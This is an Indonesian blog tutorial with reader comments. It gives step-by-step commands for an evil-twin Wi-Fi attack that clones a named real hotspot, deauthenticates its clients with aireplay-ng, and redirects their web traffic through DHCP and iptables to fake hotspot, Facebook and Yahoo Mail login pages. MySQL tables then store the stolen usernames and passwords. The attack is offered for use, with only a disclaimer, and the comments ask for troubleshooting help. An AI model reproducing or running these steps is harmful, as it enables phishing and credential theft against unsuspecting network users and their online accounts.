Banner 468 x 60

Loading...

Hack Wifi WPA2, Facebook, Yahoomail Sekaligus - Arminaven

Advertisement

Setelah mencoba dan gagal, coba lagi, gagal lagi, akhirnya dengan penuh kesabaran dan memperhatikan tutorial tutorial secara cermat dari berbagai forum dan situs akhirnya arminaven berhasil menghack wifi wpa2 dengan cara menduplikat wifi tersebut. bukan itu saja, arminaven juga mengecoh user dengan halaman palsu facebook dan yahoo mail. sangat luar biasa tentunya menurut arminaven. jika ada dari rekan rekan yang ingin mencoba. maka ikuti saja langkah langkah arminaven berikut ini:

untuk langkah pertama kita membutuhkan sebuah database tempat penyimpanan username dan password nantinya. caranya: buka konsole, ketik mysql -u root -p dan enter. password standardnya adalah"toor". sebelumnya anda harus menjalankan Apache dan Mysql terlebih dahulu, berikut caranya:

jika sobat arminaven mengganti password database dari yang standardnya maka sobat juga harus mangganti file PHP kita nantinya. file PHP kita ada tiga kategori, yaitu file untuk Hotspot, file untuk Facebook dan file untuk Yahoo mail. Semua file itu sudah arminaven paketkan dilink download di bawah

Pembuatan database

Setelah sobat arminaven masuk ke mysql, buatlah database dengan nama "arminaven", dan tiga buah tabel dengan masing masing nama tabel "hotspot", "facebook", "yahoo".
berikut ini syntaknya:

create database arminaven;
use arminaven;
create table hotspot(username VARCHAR(64), password VARCHAR(64));
create table facebook(username VARCHAR(64), password VARCHAR(64));
create table yahoo(username VARCHAR(64), password VARCHAR(64));


Untuk langkah kedua kita letakkan fake page (Bahan Hacking) kita di var/www

Selanjutnya settingan ip address php sobat arminaven, baik untuk file hotspot, facebook atau yahhomail. buka konsole dan ketik "ifconfig". lihat IP address sobat dan interface yang digunakan, arminaven menggunakan interface "wlan0". boleh jadi ditempat sobat wlan1 dan sebagainya. tinggal disesuaikan saja

jika file PHP diatas sudah disetting. sekarang coba buka browser sobat dan ketik "localhost" atau langsung IP address sobat.contohnya IP arminaven adalah "192.168.0.107". jika halaman hotspot terbuka, begitu juga facebook dan yahoomail. berarti tahap ini sudah benar. jadi kita ke tahap selanjutnya yaitu penginstallan dhcp3 server. arminaven tidak mengetahui untuk apa ini karena arminaven tidak memiliki basic dalam jaringan dan security, arminaven hanya temukan ini di forum forum dan berbagai blog yang selanjutnya arminaven kembangkan. menurut arminaven tool ini untuk memabuat server jadi kita bisa memberikan IP kepada client yang connect dengn server kita. ini sich menurut ane, jadi walaupun salah ane gak bakal dosa karena ini bukan masalah agama yang menuntut dalil Aqly dan Naqly :) :D. Tapi untuk lebih detail mengenai dhcp3 server ini silahkan berselancar di google :).

ocey kita install dhcp3 nya. buka konsole dan ketik:

apt-get install dhcp3-server

setelah penginstallan selesai, kita edit dan isi dengan nilai berikut ini:
kembali kita buka konsole:

gedit /etc/dhcp3/dhcpd.conf

selah halaman dhcpd terbuka, isi dengan berikut ini, cukup di copy paste saja. tidak ada yang harus diubah

ddns-update-style ad-hoc;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.1.128 netmask 255.255.255.128 {
    option subnet-mask 255.255.255.128;
    option broadcast-address 192.168.1.255;
    option routers 192.168.1.129;
    option domain-name-servers 8.8.8.8;
    range 192.168.1.130 192.168.1.140;
}

jangan lupa di save dan tutup file tersebut. selanjutny matikan interface sobat arminaven
airmon-ng stop mon0
airmon-ng stop wlan0

NB:
interface arminaven wlan0, ditempat sobat boleh jadi yang lain, wlan1 dan sebagainya.

selanjutnya kita aktifkan kembali interface kita dengan menambahkan channel hotspot yang akan kita hack dengan menduplikatnya. pada kasus arminaven channel target berada pada Channel 1 maka kita jalankan interface dengan syntak:

airmon-ng start wlan0 1

sekaarang kita buat hotspot kita dengan syntak berikut ini:

airbase-ng -e "MIS ISLAMIYAH GUPPI" -c 1 mon0

NB:
MIS ISLAMIYAH GUPPI adalah hotspot target kita yang berada pada channel 1 maka hotspot yang kita buat harus sama persis nama dan channelnya. :)

Kita akan membuat file dengan ekstensi *.sh. kita bisa menggunakan gedit untuk membuatnya yang kemudian kita letakkan di direktory "root". kebetulan file yang ane buat ane beri nama "arminaven.sh", bisa diganti dengan sesuka hati sobat asalkan nanti sewaktu di eksekusi sesuai dengan namanya.
berikut isi dari file arminaven.sh

#!/bin/bash
ifconfig at0 up
ifconfig at0 192.168.1.129 netmask 255.255.255.128
route add -net 192.168.1.128 netmask 255.255.255.128 gw 192.168.1.129
dhcpd3 -cf /etc/dhcp3/dhcpd.conf -pf /var/run/dhcp3-server/dhcpd.pid at0
iptables --flush
iptables --table nat --flush
iptables --delete-chain
iptables --table nat --delete-chain
iptables --table nat --append POSTROUTING --out-interface wlan0 -j MASQUERADE
iptables --append FORWARD --in-interface at0 -j ACCEPT
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination 192.168.0.107:80
iptables -t nat -A POSTROUTING -j MASQUERADE
/etc/init.d/dhcp3-server start

NB:
Copy paste semua kode diatas KECUALI model interface sobat, interface yang ane gunakan adalah wlan0 . silahkan sesuaikan dengan interface yang sobat gunakan, begitu juga dengan IP addres sobat, IP addres ane adalah 192.168.0.107 . ganti dengan IP sobat. selanjutnya simpan dan jalankan file arminaven.sh yang anda letakkan di root dengan cara buka konsole baru dan ketik

sekarang hotspot duplikatan kita sudah beraksi dan kita tinggal menunggu client untuk mengakses hotpsot buatan kita. sobat bisa memaksa user untuk mengakses hotspot kita dengan melakukan airodump terlebih dahulu selanjutnya aireplay.
berikut cara lengkapnya:
airodump-ng mon0 (mon0 adalah interface ane, sesuaikan dengan interface sobat)
fokuskan pada satu target:
airodump-ng --bssid (alamat AP target) -c (channel target) mon0 (interface sobat)
contoh
airodump-ng --bssid 11.22..33.44.55.66 -c 1 mon0

selanjutnya kita aireplya klient yang connect dengan hotspot tersebut untuk memutuskan koneksinya dan berharap melakukan koneksi ke AP buatan kita. caranya:
aireplay-ng -0 0 -a (AP) -c (client yang coonct) mon0 (interface)
contoh:
aireplay-ng -0 0 -a 11.22.33.44.55.66 -c 12.1b.33.3d.22.21 mon0

sekarang kita tunggu saja hasilnya.
akan ada pemberitahuan jika klient mengakses hotspot (AP) kita di konsole
airbase-ng -e "MIS ISLAMIYAH GUPPI" -c 1 mon0
jadi jika sudah ada yang masuk, silahkan cek database kita. apa yang kita dapatkan:
pergi ke myql sobat dan ketik:

show databases;
use arminaven;
show tables;
select *from hotspot;
select *from facebook;
select *from yahoo;

jrenngggg....jika sobat berhasil disana akan ada username dan password hotpsot, facebook dan yahoo mail. untuk lebih jelasnya silahkan lihat Videonya:

My Tutorila Hacking Video
Hack Wifi WPA2, Facebook, Yahoo Mail Sekaligus


NB:
Arminaven tidak bertanggung jawab atas penyelewengan dan pelanggaran yang dilakukan dengan tutorial ini. arminaven membuat tutorial ini sebatas untuk menambah pengetahuan saja.





Ingin Berlangganan Artikel Dari Blog Ini Secara Gratis??
Masukkan Email Anda Di Form Diatas & Klik Submit, Setiap Artikel Baru Arminaven Akan Dikirimkan Ke Email Anda Secara Otomatis dan Gratis Untuk Anda. Silahkan Lihat Reader Artikel Arminaven
Ucapkan Terima Kasih Anda Dengan Cara:
1. Klik Like Facebook
2. Like Twitter
3. Follow Blog
4. Memberikan Komentar
You Comment I Follow
Advertisement

15 Response to "Hack Wifi WPA2, Facebook, Yahoomail Sekaligus - Arminaven"

gak ngerti kang.. hehe

Balas

dibagian mananya mas. mungkin bisa ane bantu

Balas

monggo gan...semoga berhasil

Balas

maaf om saat# iptables --table nat -A PREROUTING -p tcp --dport 80 -j DNAT --to-destination ip adrres kita......apa yg lg konek ke internet????

Balas

sank pencerah: ya gan, itu ip address kita yang konek ke internet..

Balas

gag bisa download -_-"

Balas

barusan ane coba download kog bisa ya gan

Balas

I think the admin of this web page is genuinely working hard for his web site,
since here every material is quality based information.


Feel free to visit my weblog ... jan paler bancuri

Balas

ada sebagian perintah yang om kurangi di video atau artikelnya.....

Balas

perintah yang mana tuh?

Balas

pakai BT LIVE kok gak bisa ya

Balas

kalau cloent connect dgn hp masih bisa gak gan? mohon pencerahanya

Balas

kalau ip saya 172.20..... pada file arminaven.sh bagian route add perlu dganti tidak?

Balas
  • Berkomentarlah dengan sopan dan bijak sesuai dengan isi konten.
  • Komentar yang tidak diperlukan oleh pembaca lain [spam] akan segera dihapus.
  • Apabila artikel yang berjudul "Hack Wifi WPA2, Facebook, Yahoomail Sekaligus - Arminaven" ini bermanfaat, share ke jejaring sosial.
Konversi Kode